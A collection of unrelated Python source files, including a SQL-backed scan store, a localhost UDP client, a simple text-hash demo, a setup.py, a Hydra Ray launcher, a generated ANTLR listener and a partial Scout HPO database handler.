df = pd.DataFrame(array, columns=columns, index=index, dtype=complex)
self.store_df(key, df, append=append)
def get(self, key):
"""Return a DataFrame for a given key (table name)."""
while True:
try:
with self.engine.connect() as conn, conn.begin():
data = pd.read_sql_table(key, conn)
break
except sqlalchemy.exc.OperationalError:
sleep(0.001)
data = data.set_index('index')
return data.applymap(unserialize)
def drop_table(self, key):
"""Delete (drop) a table"""
pd.io.sql.execute('DROP TABLE {};'.format(key), self.engine)
def read_sql(self, sql):
"""Read SQL query into a data frame."""
return pd.io.sql.read_sql(sql, self.engine)
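# A minimal usage sketch (not part of the original module; the scan name,
# table key and values below are made up for illustration):
#
#     store = ScanStoreSQL('demo_scan', scanid=1)
#     store.store_dict('results', {'param': 0.5, 'value': 1 + 2j}, index=0)
#     df = store.get('results')       # DataFrame indexed by 'index'
#     store.drop_table('results')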
|
py | 1a37def4d584b26e741f794348872742537486f1 | from lpdm_base_event import LpdmBaseEvent
class LpdmPowerEvent(LpdmBaseEvent):
def __init__(self, source_device_id, target_device_id, time, value):
LpdmBaseEvent.__init__(self, source_device_id, target_device_id, time, value)
self.event_type = "power"
|
py | 1a37dfeda740e5343077231cedb3c573a9cd4e5c | import socket
host = '127.0.0.1'
port = 80
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.sendto(b'AAABBBCCC', (host, port))
data, addr = client.recvfrom(4096)
print(data)
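# A UDP echo server is assumed to be listening on (host, port); a minimal
# counterpart sketch (not part of the original script) would be:
#
#     server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#     server.bind((host, port))
#     payload, sender = server.recvfrom(4096)
#     server.sendto(payload, sender)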
|
py | 1a37e09373fb799dd0b382dac9bba3c5d8918a30 | #!/usr/bin/env python3
import operator
from collections import Counter
def read_pt_br_words(filename='/usr/share/dict/brazilian'):
with open(filename) as f:
lines = list(f)
words = [line[:-1] for line in lines]
print(f"Leu {len(words)} palavras em pt-BR")
return words
def make_sbk_table(words):
c = Counter()
for word in words:
c.update(word)
chars = sorted(c.keys())
print(f"Tabela SBK ({len(chars)} caracteres): {''.join(chars)}")
return {ch: i for i, ch in enumerate(chars)}
def _sbk(text, char_to_int=ord):
s = 0
for ch in text:
s += char_to_int(ch)
return {'text': text, 'sum': s, 'sbk': s % 1000}
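# Worked example with the default char_to_int=ord:
# _sbk('abc') sums ord('a') + ord('b') + ord('c') = 97 + 98 + 99 = 294,
# so it returns {'text': 'abc', 'sum': 294, 'sbk': 294}.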
def _show_sbk(text, char_to_int=ord):
info = _sbk(text, char_to_int)
    print(f'Text: {info["text"]!r}')
    print(f'Sum: {info["sum"]}')
    print(f'SBK: {info["sbk"]:03d}')
print()
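# The tweet below is kept in Portuguese because it is the exact text being
# hashed; in English it reads: "A very simple hash function for a piece of
# text is 'Assign a value to each character, add them all up, and take the
# last 3 digits'. Let's call this function SBK (Bruno Kim's Sum). For any
# text it produces a number between 000 and 999."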
tweet = """Uma função hash bem simples para um trecho de texto é
"Atribua um valor pra cada caractere, some todos, e pegue os últimos 3 dígitos"
Vamos chamar essa função de SBK (Soma do Bruno Kim). Ela produz, pra qualquer texto, um número entre 000 e 999."""
def main():
words = read_pt_br_words()
table = make_sbk_table(words)
def char_to_int(ch):
if ch in table:
return table[ch] + 1
return ord(ch) + len(table) + 1
def sbk(text):
return _sbk(text, char_to_int)
def show_sbk(text):
return _show_sbk(text, char_to_int)
print()
show_sbk(tweet)
show_sbk("patos")
show_sbk("nadam")
show_sbk("debaixo")
show_sbk("d'água")
sbk_infos = [sbk(word) for word in words]
sums = Counter(info['sum'] for info in sbk_infos)
hashes = Counter(info['sbk'] for info in sbk_infos)
import csv
with open('sbk-sum-freq.csv', 'w') as f:
w = csv.writer(f)
w.writerow(['sum', 'freq'])
for i in range(max(sums)+1):
w.writerow([i, sums[i]])
with open('sbk-freq.csv', 'w') as f:
w = csv.writer(f)
w.writerow(['hash', 'freq'])
for i in range(1000):
w.writerow([i, hashes[i]])
cum = 0
by_freq = sorted(hashes.items(), reverse=True, key=lambda entry: entry[1])
for i, (h, freq) in enumerate(by_freq):
#print(f"{h:03d}: {freq} (cum={cum:06d})")
cum += freq
if cum > len(words)/2:
print(f"{i} hashes ocupam >50% de todas as palavras")
break
print()
print("SBK:")
print(f" patos: {sbk('patos')['sbk']:03d}")
print(f" patas: {sbk('patas')['sbk']:03d}")
print(f" pat: {sbk('pat')['sbk']:03d}")
print(f" patoso: {sbk('patoso')['sbk']:03d}")
words_201 = [word for word, info
in zip(words, sbk_infos)
if info['sbk'] == 201]
smallest_201 = sorted(words_201, key = lambda s: len(s))[:200]
print(smallest_201)
import hashlib
def sha256(text):
m = hashlib.sha256()
m.update(text.encode("utf-8"))
x = 0
for b in m.digest():
x = 256*x + b
return x
print()
print("SHA-256:")
print(f" patos: {sha256('patos'):076d}")
print(f" patas: {sha256('patas'):076d}")
print(f" pat: {sha256('pat'):076d}")
print(f" patoso: {sha256('patoso'):076d}")
if __name__ == '__main__':
main()
|
py | 1a37e0dc89eaaf1c9baefea9adfa0fdbd8114ebf | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from setuptools import setup
name_ = 'lindh-jsonobject'
github_name = 'jsonobject'
version_ = '1.4.0'
packages_ = [
'lindh.jsonobject',
]
with open("README.rst", "r") as fh:
long_description = fh.read()
classifiers = [
"Programming Language :: Python :: 3",
"Operating System :: OS Independent",
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
]
setup(
name=name_,
version=version_,
author='Johan Egneblad',
author_email='[email protected]',
description='JSON serializable objects',
long_description=long_description,
long_description_content_type="text/x-rst",
license="MIT",
url='https://github.com/eblade/'+github_name,
download_url=('https://github.com/eblade/%s/archive/v%s.tar.gz'
% (github_name, version_)),
packages=packages_,
install_requires=[],
classifiers=classifiers,
)
|
py | 1a37e15cc61d65ac92208dd33fd4df010125cfad | import pandas as pd
def get_density(s, T):
try:
s = s.replace('%20', '+')
    except AttributeError:  # non-string input has no .replace
pass
density_url = 'http://ddbonline.ddbst.de/DIPPR105DensityCalculation/DIPPR105CalculationCGI.exe?component=' + s
if s == 'Hexane':
rho = float(655)
else:
density = pd.read_html(density_url)[6]
density = density.drop(density.index[0:3]).drop('No.', axis=1)
        # `density` is a single-row frame after dropping the header rows
        A = float(density['A'].iloc[0])
        B = float(density['B'].iloc[0])
        C = float(density['C'].iloc[0])
        D = float(density['D'].iloc[0])
        Tmin, Tmax = float(density['Tmin'].iloc[0]), float(density['Tmax'].iloc[0])  # in K
def rho(T):
return A / B ** (1 + (1 - T / C) ** D)
return rho(T) if s != 'Hexane' else rho
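# The nested rho(T) implements the DIPPR-105 liquid-density correlation the
# DDBST page is based on, rho = A / B**(1 + (1 - T/C)**D), with T in kelvin
# (valid between Tmin and Tmax; results are typically kg/m^3). A usage
# sketch, assuming the component name matches a DDBST entry:
#
#     rho_water = get_density('Water', 298.15)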
|
py | 1a37e175dab1e6379aca817ddcc4c8e396271b20 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import logging
from typing import Optional, Sequence
from hydra.core.utils import JobReturn
from hydra.plugins.launcher import Launcher
from hydra.types import HydraContext, TaskFunction
from omegaconf import DictConfig
from hydra_plugins.hydra_ray_launcher._config import ( # type: ignore
RayAWSConf,
RsyncConf,
)
log = logging.getLogger(__name__)
class RayAWSLauncher(Launcher):
def __init__(
self,
env_setup: DictConfig,
ray: RayAWSConf,
stop_cluster: bool,
sync_up: RsyncConf,
sync_down: RsyncConf,
) -> None:
self.ray_cfg = ray
self.stop_cluster = stop_cluster
self.sync_up = sync_up
self.sync_down = sync_down
self.config: Optional[DictConfig] = None
self.hydra_context: Optional[HydraContext] = None
self.task_function: Optional[TaskFunction] = None
self.ray_yaml_path: Optional[str] = None
self.env_setup = env_setup
def setup(
self,
*,
hydra_context: HydraContext,
task_function: TaskFunction,
config: DictConfig,
) -> None:
self.config = config
self.hydra_context = hydra_context
self.task_function = task_function
def launch(
self, job_overrides: Sequence[Sequence[str]], initial_job_idx: int
) -> Sequence[JobReturn]:
from . import _core_aws
return _core_aws.launch(
launcher=self, job_overrides=job_overrides, initial_job_idx=initial_job_idx
)
|
py | 1a37e2913f22d6a21216335e609f32d614790faa | # -*- coding: utf-8 -*-
import unittest
from guietta.guietta import _normalize
class NormalizeTest(unittest.TestCase):
def test_normal_chars(self):
a = 'foobar'
assert _normalize(a) == a
def test_normal_chars2(self):
a = 'FooBar_123'
assert _normalize(a) == a
def test_special_chars(self):
a = 'Foo!Bar?-/4+`\\ 123:*'
assert _normalize(a) == 'FooBar4123'
|
py | 1a37e2d58cf451b706a16f0186a38540a4cee032 | # Generated from ANTLRv4Parser.g4 by ANTLR 4.9.2
from antlr4 import *
if __name__ is not None and "." in __name__:
from .ANTLRv4Parser import ANTLRv4Parser
else:
from ANTLRv4Parser import ANTLRv4Parser
# This class defines a complete listener for a parse tree produced by ANTLRv4Parser.
class ANTLRv4ParserListener(ParseTreeListener):
# Enter a parse tree produced by ANTLRv4Parser#grammarSpec.
def enterGrammarSpec(self, ctx:ANTLRv4Parser.GrammarSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#grammarSpec.
def exitGrammarSpec(self, ctx:ANTLRv4Parser.GrammarSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#grammarDecl.
def enterGrammarDecl(self, ctx:ANTLRv4Parser.GrammarDeclContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#grammarDecl.
def exitGrammarDecl(self, ctx:ANTLRv4Parser.GrammarDeclContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#grammarType.
def enterGrammarType(self, ctx:ANTLRv4Parser.GrammarTypeContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#grammarType.
def exitGrammarType(self, ctx:ANTLRv4Parser.GrammarTypeContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#prequelConstruct.
def enterPrequelConstruct(self, ctx:ANTLRv4Parser.PrequelConstructContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#prequelConstruct.
def exitPrequelConstruct(self, ctx:ANTLRv4Parser.PrequelConstructContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#optionsSpec.
def enterOptionsSpec(self, ctx:ANTLRv4Parser.OptionsSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#optionsSpec.
def exitOptionsSpec(self, ctx:ANTLRv4Parser.OptionsSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#option.
def enterOption(self, ctx:ANTLRv4Parser.OptionContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#option.
def exitOption(self, ctx:ANTLRv4Parser.OptionContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#optionValue.
def enterOptionValue(self, ctx:ANTLRv4Parser.OptionValueContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#optionValue.
def exitOptionValue(self, ctx:ANTLRv4Parser.OptionValueContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#delegateGrammars.
def enterDelegateGrammars(self, ctx:ANTLRv4Parser.DelegateGrammarsContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#delegateGrammars.
def exitDelegateGrammars(self, ctx:ANTLRv4Parser.DelegateGrammarsContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#delegateGrammar.
def enterDelegateGrammar(self, ctx:ANTLRv4Parser.DelegateGrammarContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#delegateGrammar.
def exitDelegateGrammar(self, ctx:ANTLRv4Parser.DelegateGrammarContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#tokensSpec.
def enterTokensSpec(self, ctx:ANTLRv4Parser.TokensSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#tokensSpec.
def exitTokensSpec(self, ctx:ANTLRv4Parser.TokensSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#channelsSpec.
def enterChannelsSpec(self, ctx:ANTLRv4Parser.ChannelsSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#channelsSpec.
def exitChannelsSpec(self, ctx:ANTLRv4Parser.ChannelsSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#idList.
def enterIdList(self, ctx:ANTLRv4Parser.IdListContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#idList.
def exitIdList(self, ctx:ANTLRv4Parser.IdListContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#action_.
def enterAction_(self, ctx:ANTLRv4Parser.Action_Context):
pass
# Exit a parse tree produced by ANTLRv4Parser#action_.
def exitAction_(self, ctx:ANTLRv4Parser.Action_Context):
pass
# Enter a parse tree produced by ANTLRv4Parser#actionScopeName.
def enterActionScopeName(self, ctx:ANTLRv4Parser.ActionScopeNameContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#actionScopeName.
def exitActionScopeName(self, ctx:ANTLRv4Parser.ActionScopeNameContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#actionBlock.
def enterActionBlock(self, ctx:ANTLRv4Parser.ActionBlockContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#actionBlock.
def exitActionBlock(self, ctx:ANTLRv4Parser.ActionBlockContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#argActionBlock.
def enterArgActionBlock(self, ctx:ANTLRv4Parser.ArgActionBlockContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#argActionBlock.
def exitArgActionBlock(self, ctx:ANTLRv4Parser.ArgActionBlockContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#modeSpec.
def enterModeSpec(self, ctx:ANTLRv4Parser.ModeSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#modeSpec.
def exitModeSpec(self, ctx:ANTLRv4Parser.ModeSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#rules.
def enterRules(self, ctx:ANTLRv4Parser.RulesContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#rules.
def exitRules(self, ctx:ANTLRv4Parser.RulesContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ruleSpec.
def enterRuleSpec(self, ctx:ANTLRv4Parser.RuleSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ruleSpec.
def exitRuleSpec(self, ctx:ANTLRv4Parser.RuleSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#parserRuleSpec.
def enterParserRuleSpec(self, ctx:ANTLRv4Parser.ParserRuleSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#parserRuleSpec.
def exitParserRuleSpec(self, ctx:ANTLRv4Parser.ParserRuleSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#exceptionGroup.
def enterExceptionGroup(self, ctx:ANTLRv4Parser.ExceptionGroupContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#exceptionGroup.
def exitExceptionGroup(self, ctx:ANTLRv4Parser.ExceptionGroupContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#exceptionHandler.
def enterExceptionHandler(self, ctx:ANTLRv4Parser.ExceptionHandlerContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#exceptionHandler.
def exitExceptionHandler(self, ctx:ANTLRv4Parser.ExceptionHandlerContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#finallyClause.
def enterFinallyClause(self, ctx:ANTLRv4Parser.FinallyClauseContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#finallyClause.
def exitFinallyClause(self, ctx:ANTLRv4Parser.FinallyClauseContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#rulePrequel.
def enterRulePrequel(self, ctx:ANTLRv4Parser.RulePrequelContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#rulePrequel.
def exitRulePrequel(self, ctx:ANTLRv4Parser.RulePrequelContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ruleReturns.
def enterRuleReturns(self, ctx:ANTLRv4Parser.RuleReturnsContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ruleReturns.
def exitRuleReturns(self, ctx:ANTLRv4Parser.RuleReturnsContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#throwsSpec.
def enterThrowsSpec(self, ctx:ANTLRv4Parser.ThrowsSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#throwsSpec.
def exitThrowsSpec(self, ctx:ANTLRv4Parser.ThrowsSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#localsSpec.
def enterLocalsSpec(self, ctx:ANTLRv4Parser.LocalsSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#localsSpec.
def exitLocalsSpec(self, ctx:ANTLRv4Parser.LocalsSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ruleAction.
def enterRuleAction(self, ctx:ANTLRv4Parser.RuleActionContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ruleAction.
def exitRuleAction(self, ctx:ANTLRv4Parser.RuleActionContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ruleModifiers.
def enterRuleModifiers(self, ctx:ANTLRv4Parser.RuleModifiersContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ruleModifiers.
def exitRuleModifiers(self, ctx:ANTLRv4Parser.RuleModifiersContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ruleModifier.
def enterRuleModifier(self, ctx:ANTLRv4Parser.RuleModifierContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ruleModifier.
def exitRuleModifier(self, ctx:ANTLRv4Parser.RuleModifierContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ruleBlock.
def enterRuleBlock(self, ctx:ANTLRv4Parser.RuleBlockContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ruleBlock.
def exitRuleBlock(self, ctx:ANTLRv4Parser.RuleBlockContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ruleAltList.
def enterRuleAltList(self, ctx:ANTLRv4Parser.RuleAltListContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ruleAltList.
def exitRuleAltList(self, ctx:ANTLRv4Parser.RuleAltListContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#labeledAlt.
def enterLabeledAlt(self, ctx:ANTLRv4Parser.LabeledAltContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#labeledAlt.
def exitLabeledAlt(self, ctx:ANTLRv4Parser.LabeledAltContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerRuleSpec.
def enterLexerRuleSpec(self, ctx:ANTLRv4Parser.LexerRuleSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerRuleSpec.
def exitLexerRuleSpec(self, ctx:ANTLRv4Parser.LexerRuleSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerRuleBlock.
def enterLexerRuleBlock(self, ctx:ANTLRv4Parser.LexerRuleBlockContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerRuleBlock.
def exitLexerRuleBlock(self, ctx:ANTLRv4Parser.LexerRuleBlockContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerAltList.
def enterLexerAltList(self, ctx:ANTLRv4Parser.LexerAltListContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerAltList.
def exitLexerAltList(self, ctx:ANTLRv4Parser.LexerAltListContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerAlt.
def enterLexerAlt(self, ctx:ANTLRv4Parser.LexerAltContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerAlt.
def exitLexerAlt(self, ctx:ANTLRv4Parser.LexerAltContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerElements.
def enterLexerElements(self, ctx:ANTLRv4Parser.LexerElementsContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerElements.
def exitLexerElements(self, ctx:ANTLRv4Parser.LexerElementsContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerElement.
def enterLexerElement(self, ctx:ANTLRv4Parser.LexerElementContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerElement.
def exitLexerElement(self, ctx:ANTLRv4Parser.LexerElementContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#labeledLexerElement.
def enterLabeledLexerElement(self, ctx:ANTLRv4Parser.LabeledLexerElementContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#labeledLexerElement.
def exitLabeledLexerElement(self, ctx:ANTLRv4Parser.LabeledLexerElementContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerBlock.
def enterLexerBlock(self, ctx:ANTLRv4Parser.LexerBlockContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerBlock.
def exitLexerBlock(self, ctx:ANTLRv4Parser.LexerBlockContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerCommands.
def enterLexerCommands(self, ctx:ANTLRv4Parser.LexerCommandsContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerCommands.
def exitLexerCommands(self, ctx:ANTLRv4Parser.LexerCommandsContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerCommand.
def enterLexerCommand(self, ctx:ANTLRv4Parser.LexerCommandContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerCommand.
def exitLexerCommand(self, ctx:ANTLRv4Parser.LexerCommandContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerCommandName.
def enterLexerCommandName(self, ctx:ANTLRv4Parser.LexerCommandNameContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerCommandName.
def exitLexerCommandName(self, ctx:ANTLRv4Parser.LexerCommandNameContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerCommandExpr.
def enterLexerCommandExpr(self, ctx:ANTLRv4Parser.LexerCommandExprContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerCommandExpr.
def exitLexerCommandExpr(self, ctx:ANTLRv4Parser.LexerCommandExprContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#altList.
def enterAltList(self, ctx:ANTLRv4Parser.AltListContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#altList.
def exitAltList(self, ctx:ANTLRv4Parser.AltListContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#alternative.
def enterAlternative(self, ctx:ANTLRv4Parser.AlternativeContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#alternative.
def exitAlternative(self, ctx:ANTLRv4Parser.AlternativeContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#element.
def enterElement(self, ctx:ANTLRv4Parser.ElementContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#element.
def exitElement(self, ctx:ANTLRv4Parser.ElementContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#elements.
def enterElements(self, ctx:ANTLRv4Parser.ElementsContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#elements.
def exitElements(self, ctx:ANTLRv4Parser.ElementsContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#labeledElement.
def enterLabeledElement(self, ctx:ANTLRv4Parser.LabeledElementContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#labeledElement.
def exitLabeledElement(self, ctx:ANTLRv4Parser.LabeledElementContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ebnf.
def enterEbnf(self, ctx:ANTLRv4Parser.EbnfContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ebnf.
def exitEbnf(self, ctx:ANTLRv4Parser.EbnfContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#blockSuffix.
def enterBlockSuffix(self, ctx:ANTLRv4Parser.BlockSuffixContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#blockSuffix.
def exitBlockSuffix(self, ctx:ANTLRv4Parser.BlockSuffixContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ebnfSuffix.
def enterEbnfSuffix(self, ctx:ANTLRv4Parser.EbnfSuffixContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ebnfSuffix.
def exitEbnfSuffix(self, ctx:ANTLRv4Parser.EbnfSuffixContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerAtom.
def enterLexerAtom(self, ctx:ANTLRv4Parser.LexerAtomContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerAtom.
def exitLexerAtom(self, ctx:ANTLRv4Parser.LexerAtomContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#atom.
def enterAtom(self, ctx:ANTLRv4Parser.AtomContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#atom.
def exitAtom(self, ctx:ANTLRv4Parser.AtomContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#notSet.
def enterNotSet(self, ctx:ANTLRv4Parser.NotSetContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#notSet.
def exitNotSet(self, ctx:ANTLRv4Parser.NotSetContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#blockSet.
def enterBlockSet(self, ctx:ANTLRv4Parser.BlockSetContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#blockSet.
def exitBlockSet(self, ctx:ANTLRv4Parser.BlockSetContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#setElement.
def enterSetElement(self, ctx:ANTLRv4Parser.SetElementContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#setElement.
def exitSetElement(self, ctx:ANTLRv4Parser.SetElementContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#block.
def enterBlock(self, ctx:ANTLRv4Parser.BlockContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#block.
def exitBlock(self, ctx:ANTLRv4Parser.BlockContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ruleref.
def enterRuleref(self, ctx:ANTLRv4Parser.RulerefContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ruleref.
def exitRuleref(self, ctx:ANTLRv4Parser.RulerefContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#characterRange.
def enterCharacterRange(self, ctx:ANTLRv4Parser.CharacterRangeContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#characterRange.
def exitCharacterRange(self, ctx:ANTLRv4Parser.CharacterRangeContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#terminal.
def enterTerminal(self, ctx:ANTLRv4Parser.TerminalContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#terminal.
def exitTerminal(self, ctx:ANTLRv4Parser.TerminalContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#elementOptions.
def enterElementOptions(self, ctx:ANTLRv4Parser.ElementOptionsContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#elementOptions.
def exitElementOptions(self, ctx:ANTLRv4Parser.ElementOptionsContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#elementOption.
def enterElementOption(self, ctx:ANTLRv4Parser.ElementOptionContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#elementOption.
def exitElementOption(self, ctx:ANTLRv4Parser.ElementOptionContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#identifier.
def enterIdentifier(self, ctx:ANTLRv4Parser.IdentifierContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#identifier.
def exitIdentifier(self, ctx:ANTLRv4Parser.IdentifierContext):
pass
del ANTLRv4Parser |
py | 1a37e37e9c7dd1df14034797bf172e3cc7942369 | # -*- coding: utf-8 -*-
import logging
import operator
from pymongo.errors import DuplicateKeyError, BulkWriteError
import pymongo
from anytree import RenderTree, Node, search, resolver
from anytree.exporter import DictExporter
from scout.exceptions import IntegrityError
LOG = logging.getLogger(__name__)
class HpoHandler(object):
def load_hpo_term(self, hpo_obj):
"""Add a hpo object
Arguments:
hpo_obj(dict)
"""
LOG.debug("Loading hpo term %s into database", hpo_obj["_id"])
try:
self.hpo_term_collection.insert_one(hpo_obj)
except DuplicateKeyError as err:
raise IntegrityError("Hpo term %s already exists in database".format(hpo_obj["_id"]))
LOG.debug("Hpo term saved")
def load_hpo_bulk(self, hpo_bulk):
"""Add a hpo object
Arguments:
hpo_bulk(list(scout.models.HpoTerm))
Returns:
result: pymongo bulkwrite result
"""
LOG.debug("Loading hpo bulk")
try:
result = self.hpo_term_collection.insert_many(hpo_bulk)
except (DuplicateKeyError, BulkWriteError) as err:
raise IntegrityError(err)
return result
def hpo_term(self, hpo_id):
"""Fetch a hpo term
Args:
hpo_id(str)
Returns:
hpo_obj(dict)
"""
LOG.debug("Fetching hpo term %s", hpo_id)
return self.hpo_term_collection.find_one({"_id": hpo_id})
def hpo_terms(self, query=None, hpo_term=None, text=None, limit=None):
"""Return all HPO terms
If a query is sent hpo_terms will try to match with regex on term or
description.
Args:
query(str): Part of a hpoterm or description
hpo_term(str): Search for a specific hpo term
limit(int): the number of desired results
Returns:
result(pymongo.Cursor): A cursor with hpo terms
"""
query_dict = {}
search_term = None
if query:
query_dict = {
"$or": [
{"hpo_id": {"$regex": query, "$options": "i"}},
{"description": {"$regex": query, "$options": "i"}},
]
}
search_term = query
elif text:
new_string = ""
for i, word in enumerate(text.split(" ")):
if i == 0:
new_string += word
else:
new_string += ' "{0}"'.format(word)
LOG.info("Search HPO terms with %s", new_string)
query_dict["$text"] = {"$search": new_string}
search_term = text
elif hpo_term:
query_dict["hpo_id"] = hpo_term
search_term = hpo_term
limit = limit or 0
res = (
self.hpo_term_collection.find(query_dict)
.limit(limit)
.sort("hpo_number", pymongo.ASCENDING)
)
return res
def generate_hpo_gene_list(self, *hpo_terms):
"""Generate a sorted list with namedtuples of hpogenes
Each namedtuple of the list looks like (hgnc_id, count)
Args:
hpo_terms(iterable(str))
Returns:
hpo_genes(list(HpoGene))
"""
genes = {}
for term in hpo_terms:
hpo_obj = self.hpo_term(term)
if hpo_obj:
for hgnc_id in hpo_obj["genes"]:
if hgnc_id in genes:
genes[hgnc_id] += 1
else:
genes[hgnc_id] = 1
else:
LOG.warning("Term %s could not be found", term)
sorted_genes = sorted(genes.items(), key=operator.itemgetter(1), reverse=True)
